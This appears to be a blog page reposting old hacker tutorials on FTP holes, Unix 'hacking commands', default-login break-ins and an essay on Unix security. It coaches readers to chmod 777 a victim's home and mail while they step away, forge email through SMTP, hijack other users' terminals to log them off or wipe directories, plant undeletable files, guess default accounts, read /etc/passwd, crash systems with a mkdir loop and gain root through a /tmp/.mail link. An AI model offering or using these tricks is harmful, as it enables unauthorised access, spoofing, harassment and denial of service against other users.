You browse through a remote FTP site the same way you browse through your own computer's files and directories (of course, you don't have read and/or write access to every file on the system, and some files you can't even see).
FTP Commands
------------
The following are several basic FTP commands. To communicate with FTP daemons(7), connect to port(2) 21 and then use the following commands (see footnote 2 below) to communicate with the FTP server:
cd change directory (on the server)
lcd change local directory (when sending a file, the path(4) of the specified file will be the path you specify on lcd)
dir,ls directory listing
binary change mode to binary transfer
get retrieve a file
mget retrieve many files
put send a file
mput send many files
pwd print working directory on the server
Footnotes
+++++++++
1. For thousands of computer-related acronyms and abbreviations head to blacksun.box.sk and download the file called acros.txt from the projects page.
2. If you don't feel like typing stupid commands, there are lots of FTP clients(5) who will do all the work for you, but fortunately some will still show you all the commands they use so you'll be able to learn new commands.
You can download FTP clients for every Operating System from TUCOWS. Simply go to the nearest TUCOWS mirror site(3) or go directly to www.tucows.com.
FTP Hacking
-----------
Since there are so many FTP holes for so many FTP server programs and so many Operating Systems, I decided that the best way it simply to explain to you how to find information about security holes by yourself.
I will also introduce several interesting FTP security holes near the end of this section.
To find FTP exploits, try searching the following websites (or join the BugTraq mailing list at www.securityfocus.com):
CERT (Computer Emergency Response Team) - http://cert.org
X-Force Search (simplest) - http://www.iss.net/cgi-bin/xforce/xforce_index.pl
Packet Storm - packetstorm.genocide2600.com
BugTraq Archives - http://www.securityfocus.com/level2/bottom.html?go=search
Fyodor's Exploit World - http://www.insecure.org/sploits.html
Spikeman's Denial Of Service Website (for DoS(9) attacks against FTP servers) - http://www.genocide2600.com/~spikeman/
RootShell - http://www.rootshell.com
Slashdot - http://www.slashdot.org
Data - http://www.hideaway.net/data.html
After you get to one of the following search sites (I recommend the BugTraq Archives) search for the keywords you want.
For example: you find out(5) that your target is using this OS with this FTP server and this Webserver program etc'. Try combining all of those pieces of information and I'm sure you'll find the holes that fit you the most.
You can also try searching holes on your own computer.
Speaking about holes, we will explain about many security holes on the upcoming Sendmail tutorial (see blacksun.box.sk).
Now, for several selected FTP holes.
Selected FTP Holes
******************
The following FTP holes aren't new or extraordinary or incredibly fantastic or anything of that sort of matter. They're just good for learning.
I picked some interesting FTP holes and written a small explanation about them just to get the newbies started.
Note: the sites I got these from aren't "evil hacking sites". These explanations are called advisories and they are meant to be used by people who want to fix bugs on their systems. Whether you use them for that purpose or others is none of our business.
1) Some FTP daemons allows a premature PASV command, which can cause some FTP daemons to crash with a core dump(9). FTP core dumps can be used to salvage encrypted passwords, bypassing any shadow password scheme.
It is not known exactly which servers are immune to this and which are not, and the only workaround right now is to get a newer FTP server program.
Also see http://www.genocide2600.com/~spikeman/bisonware3.html for a DoS(9) attack against BisonWare FTP Server 3.5 similar to this hole.
2) FTP Bounce Attack (too long, see http://www.netspace.org/cgi-bin/wa?A2=ind9507B&L=bugtraq&P=R1425 (From BugTraq))
3) Local bug in FTP Daemon (too long, see http://www.netspace.org/cgi-bin/wa?A2=ind9507B&L=bugtraq&P=R1345 (From BugTraq))
4) (Quotes in partfrom BugTraq) Impact: Anybody from outside can shutdown your pc ftp server. And if u are under win3.1 the system will crash.
Program: WinQVT/NET
Version: All versions.. 16 and 32 bits
Solution.. dont use it or upgrade
Exploit: Just Send a OOB (Out of Band) to port 21,
Exploit for dummies: Take any winnuke, start it, and when u find a "139" change it to "21" instead.
OK, I know this is stupid....... :P. But maybe somebody will need it.. who knows...
Note: A patched version of NT 4.0 isn't vulnerable to this running MS's FTP server. I haven't had a chance to test an unpatched server, but IIRC, I did check the FTP port when the OOB problem was first reported and it didn't cause a crash.
Newbies Corner
--------------
1. Protocol - a set of rules and regulations, similar to a language. When two computers know the same protocol, they can use it to communicate with each other.
2. Port - (for the more technical explanation of what ports are, see the end of this explanation) ports are like holes that enable things (data, in this case) to come in or out of them.
There are physical ports and software ports on your computer. Physical ports are those slots on the back of your computer, your monitor etc'. Now, software ports are used when connecting to other computers.
For example: I just bought a new computer and I want to turn it into a webserver (I want to enable people to access selecetd web pages, pictures, cgi and java scripts or applets, programs etc' that are located on my computer). In order for that to happen, I need to install a webserver software.
The webserver software opens a port on my computer and names it port 80. Then it listens to incoming connections on that port.
When someone starts his Internet browser (Netscape, Lynx, Microsoft Explorer etc') and surfs to my website, his browser connects to my computer on port 80 and then sends HTTP commands that my webserver program can understand into it.
My webserver program quickly picks up the incoming data and then sends it back into a port that the surfer's browser opened on the surfer's computer. The browser will listen on that port and wait for the data (the HTML page, the picture, the program etc') to come in through it.
There are different ports for different services (we'll get to that) so data won't mix up. Imagine your browser getting data your FTP client was supposed to get.
I hope you got the main idea of what a port is.
Now, there are three kinds of ports: well-known ports, registered ports and dynamic/private ports.
The well known ports are those from 0 through 1023. These are default ports for several services (a webserver is a service because it listens for connections from remote computers and then sends something back). For example: the default port for webservers is 80. Else, how would your browser know which port he has to access?
Now, the registered ports are those from 1024 through 49151. These ports are reserved for several programs. For example: ICQ (www.icq.com) reserves a port and listens to incoming messages on it.
The dynamic and/or private ports are those from 49152 through 65535, and can be used by anyone for any given purpose.
"Techy Explanation" - To grant simultaneous access to the TCP module, TCP provides a user interface called a port.
Ports are used by the kernel to identify network processes. These are strictly transport layer entities (that is to say that IP could care less about them).
Together with an IP address, a TCP port provides provides an endpoint for network communications.
In fact, at any given moment *all* Internet connections can be described by 4 numbers: the source IP address and source port and the destination IP address and destination port.
Servers are bound to 'well-known' ports so that they may be located on a standard port on different systems.
For example, the telnet daemon sits on TCP port 23, the FTP daemon sits on TCP port 21, the rlogin daemon sits on TCP port 513 etc'.
Important note about well-known ports: services (daemons waiting for incoming connections that serve people in some way) on these ports can be only ran by root, so inferior users won't start messing up with important ports.
3. Mirror site - a website which is an exact copy of the original website which is hosted by a different server.
Mirror sites can be used to speed up downloads/uploads. For example: instead of downloading/uploading from/to the main tucows webserver, located somewhere distantly from my home, I can simply do it from one of their Israeli mirrors (mirror site located in Israel, my country) and that way the downloads/uploads would go faster.
4. Path - UNIX example: if a file is located at /etc/passwd, the file's path would be /etc.
DOS/Windows example: if a file is located at c:\windows\win.exe, the file's path would be c:\windows.
There are two kinds of paths: a complete path and a relative path.
Complete path on DOS/Windows: if the file is located on c:\program files\quickview plus\ then this is the file's complete path.
Complete path on UNIX: if the file is located at /usr/local/sbin then this is the file's complete path.
Relative path on DOS/Windows: if the current directory (the directory you are on at the moment) is c:\windows and the target file is located at c:\windows\temp then the relative path to this file is temp.
Relative path on UNIX: if the current directory is /usr/nobody and the file is located at /usr/nobody/public_html/cgi-bin then the file's relative path is public_html/cgi-bin.
5. Client / Server programs - A client program is a program that uses a resource offered by another program/computer.
A server program is a program that supplies resources to client programs.
Example: Client=Netscape Navigator. Server=Apache version 1.6.6 (a webserver, meaning a program that lets people who use Internet browsers to download specific web pages, pictures, files etc' from the computer it is installed on).
6. How to find out information about remote hosts - the best way to find out information is too look at daemon(6) banners. Daemon banners are small pieces of information some daemons return when connected to in order for the remote machine (the one connecting to the daemon) to know how to interact with them better.
Try connecting to port 80 (webserver) and sending some commands like get and then looking at the banner. You may also try Sendmail (see next tutorial) on port 25, Telnet on port 23, FTP on port 21 or whatever you can come up with.
7. Daemon - a program that listens for incoming connections from remote machines on a specified port(2) and interacts with them.
8. Root - also referred as superuser, because his permissions are endless. His UID (User ID number, an identification number and user on a UNIX system has) and GID (Group ID. You can create groups and give them several permissions. For example: everyone from the accounting department can read and execute all the files on this directory, etc') are always 0 (except on very altered boxes).
Once you are root, you can do practically anything on a system.
Core Dump - when a program crashes it dumps all the core (all the info it handles that isn't saved on disk, meaning all of the program's stuff that are on the RAM chip) into a temporary file.
9. DoS - Denial of Service. A nuke in dummies language. Some kind of an attack that causes the target computer to deny some/all kinds of services to the users of that computer (including remote users).
For example: Winnuke (also known as OOB), the simplest DoS in the world.
(Taken from Spikeman's DoS site) This denial of service program affects Windows clients by sending an "Out of Band" exception message to port 139, which does not know how to handle it. This is a standard listening port on Windows operating systems. Users of Win 3.11, Win95, and
Win NT are vulnerable to this attack. This program is basically a nuisance program, but it is being widely circulated over the internet now. It has become a bother in chatrooms and on IRC. By using your IP# and sending OOB data to port 139, malicious users can disconnect you from
the net, often leaving you with low resources and the blue tinted screen. Some of you may have been victims already. If this happens to you on Win 95, you will see a Windows fatal error message similar to the following:
Fatal exception 0E at 0028: in VxD MSTCP(01) + 000041AE.
This was called from 0028: in VxD NDIS(01) + 00000D7C.
Rebooting the comp should return it to normal state.
Patches ("fixes") For WinNuke (OOB)
-=-=-=-=-=-=-=-=-=-=-=-
Additional Information on WinNuke
http://support.microsoft.com/support/kb/articles/Q168/7/47.asp
Windows 95 Patches
http://support.microsoft.com/download/support/mslfiles/Vipup11.exe
http://support.microsoft.com/download/support/mslfiles/Vipup20.exe (for Winsock 2.0*)
http://www.theargon.com/defense/nuke/index.html
Please read notes referring to 95 patches before installing.
Which version of Winsock do you have on your Windows 95 PC?
http://premium.microsoft.com/support/kb/articles/Q177/7/19.asp
http://www.theargon.com/defense/nuke/index.html
Windows NT 4.0 Patch
http://support.microsoft.com/support/kb/articles/Q143/4/78.asp
http://www.theargon.com/defense/nuke/index.html
Please read notes referring to Windows NT patches before installing.
More info on DoS attacks can be found at Spikeman's DoS site: http://www.genocide2600.com/~spikeman/main.html
* I do not know it it will work on newer versions of Winsock, so you'd better downgrade to Winsock 1.1 (the version that comes with Windows 95) by going to Control Panel, Network and removing TCP/IP and Dial Up Adapter(11) and then readding them (click add, choose protocol and in the company frame choose Microsoft and you'll find TCP/IP. For DUN do the same but choose adapter instead of protocol).
After you finish downgrading reupgrade to Winsock 2.0, apply the patch (Vipup20.exe) and then upgrade to newer versions of Winsock.
10. Flames - the action of flaming someone (send him angry mail about things he has done, opinions he has etc' which you do not agree with).
11. DUN - Dial Up Adapter. Basically it's the Windows program that dials to your ISP(12).
12. ISP - Internet Service Provider. A company that provides Internet services, such as Internet connectivity, web hosting, Email services etc'.
13. Distro - Distribution. Since UNIX is not a registered patent, trademark, copyrighted or whatever there are many distributions (software packages) of it. Every distro has it's own advantages and disadvantages (example: Redhat is the best for beginners).
HACKING COMMANDS
It is fun and often usefull to create a file that is owned
by someone else. On most systems with slack security ie 99% of
all UNIX systems, this is quite easily done. The chown command
will change any of your files to make someone else the owner.
Format is as follows:
chown ownername filelist
Where ownername is the new owner, and filelist is the list of
files to change. You must own the file which your are goin to
change, unless you are a superuser....then u can change ANYTHING!
chgrp is a similar command which will change the group
ownership on a file. If you are going to do both a chown and a
chgrp on a file, then make sure you do the chgrp first! Once the
file is owned by someone else, you cant change nything about it!
---------------------------------------------------------------
Sometimes just seeing who is on the system is a challenge in
itself. The best way is to write your own version of who in C,
but if you can't do that then this may be of some help to you:
who followed by on or more of the following flags:
-b Displays time sys as last booted.
-H Precedes output with header.
-l Lists lines waiting for users to logon.
-q displays number of users logged on.
-t displays time sys clock was last changed.
-T displays the state field (a + indicates it is
possible to send to terminal, a - means u cannot)
-u Give a complete listing of those logged on.
**who -HTu is about the best choice for the average user**
##by the way, the list of users logged on is kept in the file
/etc/utmp. If you want to write your own personalised version of
who in C, you now know where to look!###
---------------------------------------------------------------
When a users state field (see -T flag option for who
command) says that a user has their message function on, this
actually means that it is possible to get stuff onto their
screen.
Basically, every terminal on the system has a file
corresponding to it. These files can be found in the /dev
directory. You can to anything to these files, so long as you
have access -eg you can read them, and write to them, but you
will notice that they never change in size. They are called
character specific files, and are really the link between the
system and the terminals. Whatever you put in these files will
go staright to the terminal it corresponds to.
Unfortunately, on most systems, when the user logs in, the
"mesg n" command is issued which turns off write access to that
terminal, BUT- if you can start cating to that terminal before
system issues the mesg n command, then you will continue to be
able to get stuff up on that terminal! This has many varied uses.
Check out the terminal, or terminal software being used.
Often you will be able to remotely program another users
terminal, simply by 'cating' a string to a users screen. You
might be able to set up a buffer, capturing all that is typed, or
you may be able to send the terminal into a frenzy- (sometimes a
user will walk away without realizing that they are sill
effectively logged on, leaving you with access to their
account!). Some terminal types also have this great command
called transmit screen. It transmits everything on the screen,
just as if the user had typed it !
So just say I wanted to log off a user, then I would send a
clear screen command (usually ctrl l), followed by "exit"
followed by a carriage return, followed by the transmit screen
code. Using ths technique you can wipe peoples directories or
anything. My favourite is to set open access on all their files
and directories so I can peruse them for deletion etc at my own
leisure).
---------------------------------------------------------------
If you ever briefly get access to another persons account
eg. they leave the room to go to toilet or whatever, then simply
type the following:
chmod 777 $HOME
chmod 777 $MAIL
Then clear the screen so they dont see what you just typed.
Now you can go look at their directory, and their mail, and
you can even put mail in their mail file. (just use the same
format as any mail that is already there!). Next time they log in
the system will automatically inform them they have new mail!
---------------------------------------------------------------
Another way to send fake mail to people is to use the mail
server. This method produces mail that is slightly different to
normal, so anyone who uses UNIX a bit may be suspiscious when
they receive it, but it will fool the average user!
type telnet
the following prompt will appear:
telnet>
now type :
open localhost 25
some crap will come up about the mail server..now type:
mail from: xxxxxx Put any name you want.
some more bullshit will come up. Now type:
rcpt to: xxxxxx Put the name of the person to receive mail here.
now type:
data
now you can type the letter...end it with a "."
type quit to exit once you are done.
-------------------------------------------------------------
Heres one for any experimenters out there...
It is possible to create files which simply cannot be deleted
from the standard shell. To do this you will have to physically
CREATE THE FILE USING A C PROGRAM or SCRIPT FILE, and you will
have to use a sequence of control characters which cannot be
typed from the shell. Try things like Ctrl-h (this is the
code for the delete key). Just a file with the name Ctrl-h would
not be deleteable from the shell, unless you used wildcards. So,
make it a nice long series of characters, so that to delete the
file, the user has no choice but to individually copy all his
files elsewhere, then delete everything in his directory, and
then copy all his files back.....this is one of my
favourites..gets em every time!
The following script file is an example which will create a
file with the name Ctrl-h. You MUST tyoe this file in using the
vi editor or similar.
*****If you are not very good with vi, type "man vi" and print the
help file...it even contains stuff that I find useful now and
then.*****
type the following in vi...
echo'' > 'a^h'
***NOTE...to get the ^h (this really means ctrl-h) from vi type:
Ctrl v
Ctrl h
The Ctrl v instrcts vi to take the next character as a ascii
character, and not to interpret it.
change the access on the file you just created and now
execute it. It will create a file which looks like it is called
a, but try to delete it !..use wildcards if you really want to
delete it.
*> Title: Tutorial on hacking through a UNIX system
**
In the following file, all references made to the name Unix, may also be
substituted to the Xenix operating system.
Brief history: Back in the early sixties, during the development of
third generation computers at MIT, a group of programmers studying the
potential of computers, discovered their ability of performing two or
more tasks simultaneously. Bell Labs, taking notice of this discovery,
provided funds for their developmental scientists to investigate into this
new frontier. After about 2 years of developmental research, they produced
an operating system they called "Unix".
Sixties to Current: During this time Bell Systems installed the Unix system
to provide their computer operators with the ability to multitask so that
they could become more productive, and efficient. One of the systems they
put on the Unix system was called "Elmos". Through Elmos many tasks (i.e.
billing,and installation records) could be done by many people using the same
mainframe.
Note: Cosmos is accessed through the Elmos system.
Current: Today, with the development of micro computers, such multitasking
can be achieved by a scaled down version of Unix (but just as
powerful). Microsoft,seeing this development, opted to develop their own
Unix like system for the IBM line of PC/XT's. Their result they called
Xenix (pronounced zee-nicks). Both Unix and Xenix can be easily installed
on IBM PC's and offer the same function (just 2 different vendors).
Note: Due to the many different versions of Unix (Berkley Unix,
Bell System III, and System V the most popular) many commands
following may/may not work. I have written them in System V routines.
Unix/Xenix operating systems will be considered identical systems below.
How to tell if/if not you are on a Unix system: Unix systems are quite
common systems across the country. Their security appears as such:
Login; (or login;)
password:
When hacking on a Unix system it is best to use lowercase because the Unix
system commands are all done in lower- case. Login; is a 1-8 character field. It is
usually the name (i.e. joe or fred) of the user, or initials (i.e. j.jones
or f.wilson). Hints for login names can be found trashing the location of
the dial-up (use your CN/A to find where the computer is). Password: is a 1-8 character password assigned by the sysop or chosen by the user.
Common default logins
--------------------------
login; Password:
root root,system,etc..
sys sys,system
daemon daemon
uucp uucp
tty tty
test test
unix unix
bin bin
adm adm
who who
learn learn
uuhost uuhost
nuucp nuucp
If you guess a login name and you are not asked for a password, and have
accessed to the system, then you have what is known as a non-gifted account.
If you guess a correct login and pass- word, then you have a user account.
And, if you get the root p/w you have a "super-user" account.
All Unix systems have the following installed to their system:
root, sys, bin, daemon, uucp, adm Once you are in the system, you will
get a prompt. Common prompts are:
$
%
#
But can be just about anything the sysop or user wants it to be.
Things to do when you are in: Some of the commands that you may want to
try follow below:
who is on (shows who is currently logged on the system.)
write name (name is the person you wish to chat with)
To exit chat mode try ctrl-D.
EOT=End of Transfer.
ls -a (list all files in current directory.)
du -a (checks amount of memory your files use;disk usage)
cd\name (name is the name of the sub-directory you choose)
cd\ (brings your home directory to current use)
cat name (name is a filename either a program or documentation your username has written)
Most Unix programs are written in the C language or Pascal
since Unix is a programmers' environment. One of the first things done on the
system is print up or capture (in a buffer) the file containing all user names and accounts. This can be done by doing the following command:
cat /etc/passwd
If you are successful you will see a list of all accounts on the system. It
should look like this:
root:hvnsdcf:0:0:root dir:/: joe:majdnfd:1:1:Joe Cool:/bin:/bin/joe hal::1:2:Hal Smith:/bin:/bin/hal
The "root" line tells the following info :
login name=root
hvnsdcf = encrypted password
0 = user group number
0 = user number
root dir = name of user
/ = root directory
In the Joe login, the last part "/bin/joe " tells us which directory
is his home directory (joe) is. In the "hal" example the login name is
followed by 2 colons, that means that there is no password needed to get in
using his name.
Conclusion: I hope that this file will help other novice Unix hackers
obtain access to the Unix/Xenix systems that they may find.
On the Security of UNIX
=-=-=-=-=-=-=-=-=-=-=-=
Recently there has been much interest in the security aspects of operating
systems and software.At issue is the ability to prevent undesired disclosure of
information, destruction of information,and harm to the functioning of the
system.This paper discusses the degree of security which can be provided under
the system and offers a number of hints on how to improve security.The first
fact to face is that UNIX was not developed with security,in any realistic
sense,in mind;this fact alone guarantees a vast number of holes.(Actually the
same statement can be made with respect to most systems.)
The area of security in which is theoretically weakest is in protecting against
crashing or at least crippling the operation of the system.The problem here is
not mainly in uncritical acceptance of bad parameters to system calls (there
may be bugs in this area, but none are known)but rather in lack of checks for
excessive consumption of resources.
Most notably, there is no limit on the amount of disk storage used, either in
total space allocated or in the number of files or directories.Here is a
particularly ghastly shell sequence guaranteed to stop the system:
while : ; do
mkdir x
cd x
done
Either a panic will occur because all the i-nodes on the device are used up,
or all the disk blocks will be consumed, thus preventing anyone from writing
files on the device.In this version of the system,users are prevented from
creating more than a set number of processes simultaneously,so unless users
are in collusion it is unlikely that any one can stop the system altogether.
However, creation of 20 or so CPU or disk-bound jobs leaves few resources
available for others.Also, if many large jobs are run simultaneously,swap space
may run out, causing a panic. It should be evident that excessive consumption
of diskspace, files, swap space and processes can easily occur accidentally in
malfunctioning programs as well as at command level.In fact UNIX is essentially
defenseless against this kind of abuse,nor is there any easy fix.The best that
can be said is that it is generally fairly easy to detect what has happened
when disaster strikes ,to identify the user responsible, and take appropriate
action.In practice,we have found that difficulties in this area are rather
rare,but we have not been faced with malicious users,and enjoy a fairly
generous supply of resources which have served to cushion us against accidental
overconsumption.
The picture is considerably brighter in the area of protection of information
from unauthorized perusal and destruction.Here the degree of security seems
(almost) adequate theoretically, and the problems lie more in the necessity for
care in the actual use of the system.Each UNIX file has associated with it
eleven bits of protection information together with a user identification
number and a user-group identification number (UID and GID).
Nine of the protection bits are used to specify independently permission to
read, to write, and to execute the file to the user himself, to members of the
user's group, and to all other users.Each process generated by or for a user
has associated with it an effective UID and a real UID, and an effective and
real GID.When an attempt is made to access the file for reading, writing, or
executing UID for the process is changed to the UID associated with the file;
the change persists until the process terminates or until the UID changed again
by another execution of a set-UID file.Similarly the effective group ID of a
process is changed to the GID associated with a file when that file is executed
and has the set-GID bit set.The real UID and GID of a process do not change
when any file is executed,but only as the result of a privileged system
call.The basic notion of the set-UID and set-GID bits is that one may write a
program which is executableby others and which maintains files accessible to
others only by that program.
The classical example is the game-playing program which maintains records of
the scores of its players.The program itself has to read and write the score
file,but no one but the game's sponsor can be allowed unrestricted access to
the file lest they manipulate the game to their own advantage.
The solution is to turn on the set-UID bit of the game program. When, and only
when,it is invoked by players of the game,it may update the score file but
ordinary programs executed by others cannot access the score. There are a
number of special cases involved in determining access permissions. Since
executing a directory as a program is a meaningless operation,the
execute-permission bit, for directories, is taken instead to mean permission to
search the directory for a given file during the scanning of a path name; thus
if a directory has execute permission but no read permission for a given user,
he may access files with known names in the directory,but may not read (list)
the entire contents of the directory.
Write permission on a directory is interpreted to mean that the user may create
and delete files in that directory;it is impossible for any user to write
directly into any directory..Another, and from the point of view of security,
much more serious special case is that there is a ``super user'' who is able to
read any file and write any non-directory.The super-user is also able to change
the protection mode and the owner UID and GID of any file and to invoke
privileged system calls.It must be recognized that the mere notion of a
super-user is a theoretical, and usually practical, blemish on any protection
scheme.
The first necessity for a secure system is of course arranging that all files
and directories have the proper protection modes.Traditionally, UNIX software
has been exceedingly permissive in this regard;essentially all commands create
files readable and writable by everyone.In the current version,this policy may
be easily adjusted to suit the needs ofthe installation or the individual user.
Associated with each process and its descendants is a mask, which is in effect
anded with the mode of every file and directory created by that process. In
this way, users can arrange that, by default,all their files are no more
accessible than they wish.The standard mask, set by login,allows all permiss-
ions to the user himself and to his group,but disallows writing by others.
To maintain both data privacy and data integrity,it is necessary, and largely
sufficient,to make one's files inaccessible to others. The lack of sufficiency
could follow from the existence of set-UID programs created by the user and the
possibility of total breach of system security in one of the ways discussed
below(or one of the ways not discussed below).
For greater protection,an encryption scheme is available.Since the editor is
able to create encrypted documents, and the crypt command can be used to pipe
such documents into the other text-processing programs,the length of time
during which clear text versions need be available is strictly limited.The
encryption scheme used is not one of the strongest known, but it is judged
adequate, in the sense that cryptanalysisis likely to require considerably more
effort than more direct methods of reading the encrypted files.For example, a
user who stores data that he regards as truly secret should be aware that he is
implicitly trusting the system administrator not to install a version of the
crypt command that stores every typed password in a file. Needless to say, the
system administrators must be at least as careful as their most demanding user
to place the correct protection mode on the files under their control.
In particular,it is necessary that special files be protected from writing, and
probably reading, by ordinary users when they store sensitive files belonging
to otherusers.It is easy to write programs that examine and change files by
accessing the device on which the files live.
On the issue of password security,UNIX is probably better than most systems.
Passwords are stored in an encrypted form which, in the absence of serious
attention from specialists in the field,appears reasonably secure, provided its
limitations are understood.In the current version, it is based on a slightl y
defective version of the Federal DES;it is purposely defective so that
easily-available hardware is useless for attempts at exhaustive
key-search.Since both the encryption algorithm and the encrypted passwords are
available,exhaustive enumeration of potential passwords is still feasible up to
a point.We have observed that users choose passwords that are easy to
guess:they are short, or from a limited alphabet, or in a dictionary.
Passwords should be at least six characters long and randomly chosen from an
alphabet which includes digits and special characters.
Of course there also exist feasible non-cryptanalytic ways of finding out
passwords.For example: write a program which types out ``login:''on the
typewriter and copies whatever is typed to a file of your own. Then invoke the
command and go away until the victim arrives..The set-UID (set-GID)notion must
be used carefully if any security is to be maintained. The first thing to keep
in mind is that a writable set-UID file can have another program copied onto
it.
For example, if the super-user command is writable,anyone can copy the shell
onto it and get a password-free version of Shell Unix.A more subtle problem can
come from set-UID programs which are not sufficiently careful of what is fed
into them.To take an obsolete example,the previous version of the mail command
was set-UID and owned by the super-user.This version sent mail to the r
ecipient's own directory.The notion was that one should be able to send mail to
anyone even if they want to protecttheir directories from writing. The trouble
was that mailwas rather dumb:anyone could mail someone else's priva te file to
himself.Much more seriousis the following scenario: make a file with a line
like one in the password filewhich allows one to log in as the super-user.Then
make a link named ``.mail'' to the password file in some writable directory on
the same device as the password file (say /tmp). Finally mail the bogus login
line to /tmp/.mail;You can then login as the superuser,clean up the
incriminating evidence,and have your will.
The fact that users can mount their own disks and tapes as file systems can be
another way of gaining super-user status.Once a disk pack is mounted, the
system believes what is on it.Thus one can take a blank disk pack,put on it
anything desired,and mount it.There are obvious and unfortunate consequences.
For example:a mounted disk with garbage on it will crash the system;one of the
files on the mounted disk can easily be a password-free version of Shell Unix;
other files can be unprotected entries for special files. The only easy fix
for this problem is to forbid the use of mount to unpriv- ileged users.A
partial solution, not so restrictive,would be to have the mount command examine
the special file for bad data,set-UID programs owned by others ,and accessible
special files,and balk at unprivileged invokers.
Subscribe to:
Posts (Atom)
Posts
